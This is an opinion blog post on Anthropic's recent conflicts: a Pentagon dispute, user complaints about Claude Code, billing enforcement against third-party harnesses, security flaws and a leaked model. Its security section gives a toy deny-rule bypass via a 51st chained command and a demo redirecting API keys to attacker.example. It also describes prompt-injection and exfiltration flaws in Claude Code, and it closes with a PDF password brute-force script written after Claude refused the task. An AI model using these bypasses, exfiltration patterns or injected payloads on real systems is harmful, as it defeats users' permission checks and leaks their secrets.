I asked Claude Code to brute-force a PDF password yesterday. It refused. This is a tool with full shell access, root-level file system permissions, and arbitrary command execution. It will happily rm -rf your home directory if you ask nicely. But running pdfcrack on a file you own? That crosses the line.
Theo Browne hit the same wall. He asked Claude Code to debug Dropbox not launching on his Mac. The response: “That’s outside my area. I’m built for software engineering tasks.” He copied the same prompt into Codex. It searched the web, found the issue, nuked the broken install, and gave him a reinstall checklist. First try. His take: Claude Code has become unusable for anything that isn’t strictly writing code.
This kind of friction used to be an isolated annoyance. Now it’s a symptom. In the span of two weeks, Anthropic has been fighting on five fronts simultaneously, and the thread connecting all of them is control: who has it, who wants it, and what happens when you try to hold onto all of it at once.
Front 1: The Government
On February 24, Defense Secretary Pete Hegseth delivered a formal demand: remove all usage restrictions from Claude Gov, including restrictions on mass domestic surveillance and fully autonomous weapons. Grant the Pentagon unrestricted access “for all lawful purposes.”
Anthropic CEO Dario Amodei refused. His position: frontier AI models aren’t reliable enough for fully autonomous weapons, and mass surveillance of Americans violates fundamental rights.
On March 3, Hegseth designated Anthropic a national security supply chain risk. The first time that designation has ever been applied to a US company. It’s a statute designed for foreign sabotage threats, not domestic AI startups that won’t remove safety guardrails.
The fallout was immediate:
- Department of Defense: 180-day removal order from all systems, including nuclear weapons, missile defense, and cyber warfare
- State Department: dropped Claude on direct presidential order
- Treasury and HHS: directed employees to move off Claude
- Replacements: xAI and OpenAI cleared for classified systems
On March 26, a federal judge issued a preliminary injunction, calling the Pentagon’s actions “classic First Amendment retaliation.” Judge Rita Lin noted the supply chain risk designation is normally reserved for foreign intelligence agencies and terrorists, not American companies. The DOJ has announced it will appeal.
The case is far from over. But the precedent is already set: the company most vocal about AI safety is now being punished for acting on it.
Front 2: Its Own Users
AMD’s AI director, Stella Laurenzo, filed a GitHub issue that went viral. Her conclusion, backed by 6,852 Claude Code sessions and 234,760 tool calls: “Claude cannot be trusted to perform complex engineering tasks.”
Her team traced the regression to thinking content redaction, deployed in Claude Code v2.1.69. When Claude thinks less, it defaults to the cheapest action: edit without reading, stop without finishing, take the simplest fix instead of the correct one. Every senior engineer on her team reported the same experience.
They’ve already switched providers.
Meanwhile, security researchers are hitting a different wall. Anthropic’s new cyber safeguards are blocking legitimate vulnerability research. If any prior context in a conversation triggers the filter, even innocuous follow-up messages get rejected. Researchers have to restart entire sessions from scratch.
Anthropic offers a Cyber Use Case Form for researchers to request exemptions from the new cyber safeguards. How long approval takes is unclear. The researchers being blocked are overwhelmingly defenders, not attackers. Real threat actors use self-hosted models.
Front 3: The Harness Wars
On April 4, Anthropic cut third-party harness access to subscription billing. Tools like OpenClaw that previously piggybacked on Claude Code subscriptions now require pay-as-you-go API billing.
The enforcement is blunt. Mention OpenClaw in your system prompt and Claude returns a 400 error. Peter Steinberger demonstrated it on X: `claude -p --append-system-prompt 'A personal assistant running inside OpenClaw.' 'is clawd here?'` returns a hard block.
But here’s where it gets ugly. Theo showed that the same request works if you toggle “extra usage” on in your Claude dashboard. Same system prompt, same OpenClaw mention. Extra usage off: 400 error. Extra usage on: works fine. They’re routing requests differently based on system prompt content and billing tier. The system prompt isn’t just a safety signal. It’s a billing signal.
The irony: Boris Cherny, the creator of Claude Code, actually filed PRs to OpenClaw fixing caching to reduce token burn for Anthropic model users. So Anthropic’s own people tried to make OpenClaw more efficient before killing it off anyway.
I wrote about this shift when the source leak happened. The leak made technical enforcement futile, since everyone could see exactly how the harness works. So Anthropic pivoted to billing enforcement. If you can’t stop people from cloning the architecture, charge them for the model access instead.
The question is whether the narrowing goes beyond billing. Theo’s theory: Anthropic tightened Claude Code’s system prompt (or injected restrictions at the API level) to limit it strictly to software engineering tasks, specifically to kill the OpenClaw-via-claude -p workaround. The Pi creator tracks system prompt changes across releases and found no meaningful client-side diff, which suggests the restriction is happening via API-level injection invisible to the harness source. Yesterday Claude Code debugged your computer. Today it won’t.
The real driver here might be compute. Anthropic is retiring 1M context window support for Sonnet 4.5 and Sonnet 4 on April 30, forcing migrations to 4.6 models. A million tokens per request is expensive. Multiply that by OpenClaw users running autonomous agents 24/7 on flat-rate subscriptions and the math stops working. The harness crackdown and context window retirement aren’t separate decisions. They’re the same decision: stop subsidizing the heaviest users.
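To see why the math stops working, here is a back-of-envelope sketch. Every number in it is an assumption chosen for illustration (a nominal $3 per million input tokens, 500 requests a day, a $200 flat plan), not Anthropic's actual pricing or usage data:

```python
# Back-of-envelope only: every number below is an assumption for illustration,
# not Anthropic's actual pricing or usage data.
PRICE_PER_M_INPUT = 3.00      # assumed $ per 1M input tokens
CONTEXT_TOKENS = 1_000_000    # the 1M-token window being retired
REQUESTS_PER_DAY = 500        # assumed: one autonomous agent running 24/7
FLAT_SUBSCRIPTION = 200       # assumed flat monthly plan price

input_cost_per_request = CONTEXT_TOKENS / 1_000_000 * PRICE_PER_M_INPUT
monthly_cost = input_cost_per_request * REQUESTS_PER_DAY * 30
print(f"~${monthly_cost:,.0f}/month in input tokens, served for ${FLAT_SUBSCRIPTION}/month")
```

Even if the real numbers are off by an order of magnitude in either direction, a flat-rate subscription can't absorb agents that stuff the full window on every call.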
Front 4: Its Own Security
The irony of blocking security researchers while shipping critical vulnerabilities is hard to overstate.
Since the source code leak on March 31:
- 50-subcommand bypass: Developer-configured deny rules silently disabled when a command chain exceeds 50 subcommands. A malicious CLAUDE.md file could inject a 51st command past the security check. Patched in v2.1.90
- CVE-2025-59536 (CVSS 8.7): Code execution before the user accepted the trust dialog
- CVE-2026-21852: API traffic redirectable through attacker-controlled ANTHROPIC_BASE_URL, leaking API keys before trust confirmation
- ShadowPrompt: Zero-click attack via the Chrome extension, enabling data exfiltration
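The 50-subcommand bypass is a classic truncated-validation bug. This toy sketch is hypothetical (the function, the cap constant, and the `&&`-only parsing are my inventions to illustrate the reported pattern, not Claude Code's actual implementation):

```python
MAX_CHECKED = 50  # hypothetical cap mirroring the reported bug

def is_allowed(chain: str, deny: set[str]) -> bool:
    """Toy permission check: validate each subcommand against a deny list."""
    parts = [p.strip().split()[0] for p in chain.split("&&") if p.strip()]
    # Bug pattern: only the first MAX_CHECKED subcommands are validated,
    # so a denied command at position 51 is never seen.
    return all(cmd not in deny for cmd in parts[:MAX_CHECKED])

# 50 harmless commands, then a denied one
chain = " && ".join(["echo ok"] * 50 + ["rm -rf /tmp/x"])
print(is_allowed(chain, deny={"rm"}))  # True: the 51st command slips through
```

The fix is the obvious one: validate every subcommand, or reject chains longer than the check can cover.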
The source leak itself accelerated all of this. Attackers no longer need to brute-force jailbreaks. They can study exactly how data flows through Claude Code’s four-stage context pipeline and craft payloads designed to survive compaction.
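The ANTHROPIC_BASE_URL issue listed above follows a familiar shape: a client that trusts an environment variable for its endpoint will send credentials wherever that variable points. A hypothetical sketch of the pattern (the function and the demo key are mine; only the variable name and the `x-api-key` header come from the real API):

```python
import os

def build_request(api_key: str) -> tuple[str, dict]:
    """Toy client: resolve the API endpoint from the environment."""
    base = os.environ.get("ANTHROPIC_BASE_URL", "https://api.anthropic.com")
    # If an attacker controls the environment, `base` is their server,
    # and the key below is delivered straight to them.
    return f"{base}/v1/messages", {"x-api-key": api_key}

os.environ["ANTHROPIC_BASE_URL"] = "https://attacker.example"  # malicious override
url, headers = build_request("sk-ant-demo")
print(url)  # https://attacker.example/v1/messages
```

Validating the override against an allowlist, or deferring any network call until after trust confirmation, closes the hole.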
> “These broad measures do not appear to be directed at the government’s stated national security interests.”
> — Judge Rita Lin, Northern District of California
Front 5: What’s Coming
In late March, a CMS misconfiguration exposed roughly 3,000 internal Anthropic assets, including a draft blog post describing Claude Mythos. The post described it as posing “unprecedented cybersecurity risks” and being “currently far ahead of any other AI model in cyber capabilities.”
Two versions of the blog post leaked: one calling the model “Mythos,” the other “Capybara.” Both described a fourth pricing tier above Opus. The model is reportedly 10 trillion parameters, extremely compute-intensive, and available only to a small group of early access customers. If the tier pricing follows Anthropic’s doubling pattern, expect something around $400/month for API access. Running 10T parameters doesn’t come cheap.
Anthropic is privately warning government officials that Mythos makes large-scale cyberattacks much more likely in 2026.
The irony writes itself. Anthropic is warning the same government that just blacklisted it about the risks of a model that same government can no longer access.
The Numbers That Don’t Lie
Despite everything: Anthropic’s annualized revenue hit $30 billion, up from $9 billion at the end of 2025. They’ve surpassed OpenAI. More than 1,000 enterprise customers spend over $1 million annually, double the count from February. An IPO is planned for October 2026, potentially valuing the company at $380 billion.
They just secured 3.5 GW of TPU capacity through a deal with Broadcom and Google, starting in 2027. That’s not a company hedging its bets. That’s a company expecting demand to keep exploding while simultaneously fighting the government that was its biggest customer.
The product people are complaining about is also the product everyone is paying for. The safety stance the government is punishing them for is also the stance that’s winning enterprise trust. The harness they’re trying to protect is also the one that leaked and still dominates the market.
The Control Paradox
No AI company has faced this combination of pressures simultaneously. Government retaliation, user revolt, open-source cloning, security failures, and an unreleased model that even its creators consider dangerous.
The common thread is control. Anthropic wants to control what Claude refuses (my PDF), who runs it (not OpenClaw), what the government does with it (not autonomous weapons), and how fast it thinks (thinking redaction). Every one of these control points is creating friction with someone who matters.
My PDF is still locked. I used Python and pikepdf instead. Took three minutes.
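For the curious, the workaround is a handful of lines. A minimal sketch of that kind of loop, using pikepdf’s `PasswordError` to test candidates (the digits-only charset and four-character cap are assumptions for the example, not what any particular file needs):

```python
import itertools
import string

def candidates(charset=string.digits, max_len=4):
    """Yield every candidate password up to max_len characters."""
    for length in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            yield "".join(combo)

def crack(path, charset=string.digits, max_len=4):
    """Return the first candidate that opens the PDF, or None."""
    import pikepdf  # third-party: pip install pikepdf
    for pw in candidates(charset, max_len):
        try:
            with pikepdf.open(path, password=pw):
                return pw
        except pikepdf.PasswordError:
            continue
    return None
```

Nothing clever, just exhaustive search against a file I own, which is exactly what the refused pdfcrack run would have done.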
The company that built the best AI coding tool on the market couldn’t help me crack a password on my own file. That’s the state of things.


